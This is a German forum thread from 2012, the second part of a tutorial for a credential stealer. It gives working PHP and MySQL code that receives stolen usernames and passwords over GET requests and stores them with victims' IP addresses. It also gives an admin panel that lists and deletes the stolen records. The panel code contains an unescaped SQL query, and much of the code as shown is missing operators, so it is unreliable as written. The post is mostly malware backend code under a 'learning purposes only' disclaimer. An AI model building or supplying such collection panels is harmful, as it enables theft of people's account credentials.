U-Labs
  1. 20.07.2012, 09:41 #1
    rVs14
    rVs14 ist offline
    U-Labs Plus-Mitglied
    Avatar von rVs14
    Registriert seit
    18.11.2011
    Beiträge
    985
    Thanked 513 Times in 338 Posts

    Standard [Tutorial] Stealer-Panel + Absicherung + MySQL Umbau(PHP/HTML)

    Hey,

    Nun der zweite Teil. Im letzen Tutorial haben wir uns dem Stealer als Programm gewidmet, wo wir nichts mehr verändern müssen und dem PHP Script welches wir nun noch ein bisschen verändern werden, zur Absicherung von MySQL Injections.

    Zuerst öffnen wir unsere Stealer PHP Datei und erhalten unseren Code. Dort entdecken wir 2 Variablen($username und $pass) diese Variablen müssen wir noch vor den Injections sichern indem wir folgendes nutzen: mysql_real_escape_string, dort müssen wir dann den String als Parameter übergeben und schon ist das Script gesichert. Also ersetzen wir:
    PHP-Code:
    $username $_GET['user']; 
    durch
    PHP-Code:
    $username mysql_real_escape_string($_GET['user']); 
    und
    PHP-Code:
    $pass $_GET['pw']; 
    durch
    PHP-Code:
    $pass mysql_real_escape_string($_GET['pw']); 
    Das wars auch schon zur Absicherung, widmen wir uns nun PHPMyAdmin bzw. MySQL. Zuerst legen wir uns eine neue Datenbank "script" an. Nun geht ihr oben auf SQL und fügt dort folgenden Code ein:
    PHP-Code:
    $sql "CREATE TABLE `script`.`data` (`id` INT(255) NOT NULL AUTO_INCREMENT, `user` VARCHAR(200) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL, `pass` VARCHAR(200) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL, `ip` VARCHAR(200) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL, PRIMARY KEY (`id`), UNIQUE (`user`, `pass`)) ENGINE = InnoDB;"
    und klickt ok. Das wars dann auch mit phpmyadmin. Nun kommen wir wieder zum Script. Wir löschen alles hinter dem }else{ bis zum } danach fügen wir folgenden Code dort ein:
    PHP-Code:
    $connection mysql_connect("localhost""root""");
    mysql_select_db("script"$connection);
    $sqlquery "INSERT INTO `data` SET `user` = '$username', `pass` = '$pass', `ip` = '$ip'";
    mysql_query($sqlquery$connection);
    mysql_close($connection
    Auch ein ziemlich simpler Code, am Anfang erstellen wir die Variable wo die Connection drinne gespeichert wird, dort übergeben wir 3 Parameter: host, user, pw. Danach wählen wir die Datenbank aus, dort muss 1 Parameter(Datenbankname) gegeben werden und es kann auch noch wie in meinem Fall die connection als optionaler Parameter übergeben werden.
    Danach erstellen wir einen String mit der MySQL Abfrage welche wir gleich danach ausführen. Mit mysql_query wo 1 wichtiger und 1 optionaler Parameter übergeben werden müssen. Am Ende schließen wir das ganze noch und das war es dann auch, nun widmen wir uns dem Stealerscript.

    Dieses Stealer-Panel Tutorial wird gleich in einem weiteren Beitrag posten.

    Ich übernehme keine Haftung für dieses Tutorial, der Content ist ausschließlich für Lernzwecke gedacht und soll keineswegs für kriminelle Aktivitäten gebraucht werden.
    __________________
    /edit:
    Stealerpanel Code:
    PHP-Code:
    <?php
    $conn     mysql_connect("localhost""root""");
    mysql_select_db("script"$conn);
    $code "SELECT id, user, pass, ip FROM `data`";
    $query mysql_query($code$conn);
    $datacount mysql_num_rows($query);
    echo     "Es sind ".$datacount." Datensaetze vorhanden.";
    ?>
    <html>
    <table>
    <tr>
    <td>ID</td>
    <td>User</td>
    <td>PW</td>
    <td>IP</td>
    </tr>

    <?php
    while($ad mysql_fetch_array($query)){
    ?>
    <tr>
    <td><?=$ad['id']?></td>
    <td><?=$ad['user']?></td>
    <td><?=$ad['pass']?></td>
    <td><?=$ad['ip']?></td>
    </tr>
    <?php
    }
    ?>
    </table>
    <br>
    <form method="post">
    Datensatz löschen by ID <input type="text" name="id"> <br>
    <input type="submit" name="butt" value="Absenden">
    </form>
    </html>
    <?php
    if(isset($_POST['butt'])) {
    $id $_POST['id'];
    $sql "DELETE FROM `script`.`data` WHERE `data`.`id` = '$id'";
    mysql_query($sql$conn);
    header('Location: Stealerpanel.php');
    }

    ?>
    Ich erklär den Code wahrscheinlich heute Abend . Habe grade leider keine Zeit dafür.

    Ich übernehme keine Haftung für dieses Tutorial, der Content ist ausschließlich für Lernzwecke gedacht und soll keineswegs für kriminelle Aktivitäten gebraucht werden.
    Geändert von rVs14 (20.07.2012 um 10:12 Uhr) Grund: stealerpanel
    Zitieren Zitieren
  2. 20.07.2012, 20:13 #2
    nawh
    nawh ist offline
    Permanent gesperrt
    Registriert seit
    12.12.2011
    Beiträge
    199
    Thanked 147 Times in 81 Posts

    Standard AW: [Tutorial] Stealer-Panel + Absicherung + MySQL Umbau(PHP/HTML

    Darf ich mal fragen, warum du immer was postest, wenn du unter Zeitdruck stehst?
    Schreibs doch lieber am Abend und erklär's dann in aller Ruhe statt es im nachhinein zu tun.

    Danke trotzdem
    Zitieren Zitieren

  3. The Following User Says Thank You to nawh For This Useful Post:

    John Gotti (02.02.2016)
« Vorheriges Thema | Nächstes Thema »

Ähnliche Themen

  1. [HTML Tutorial] #6 - Formulare
    Von Comu im Forum HTML
    Antworten: 0
    Letzter Beitrag: 12.08.2012, 11:59
  2. [Tutorial] Stealer (C# + PHP) #1
    Von rVs14 im Forum Tutorials
    Antworten: 2
    Letzter Beitrag: 19.07.2012, 21:50
  3. [HTML Tutorial] Übersicht
    Von Comu im Forum HTML
    Antworten: 0
    Letzter Beitrag: 17.07.2012, 12:07
  4. [HTML Tutorial] #3 - Textformatierungen
    Von Comu im Forum HTML
    Antworten: 0
    Letzter Beitrag: 17.07.2012, 11:57
  5. HTML Video Tutorial
    Von Comu im Forum Webentwicklung
    Antworten: 9
    Letzter Beitrag: 17.11.2011, 01:49
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.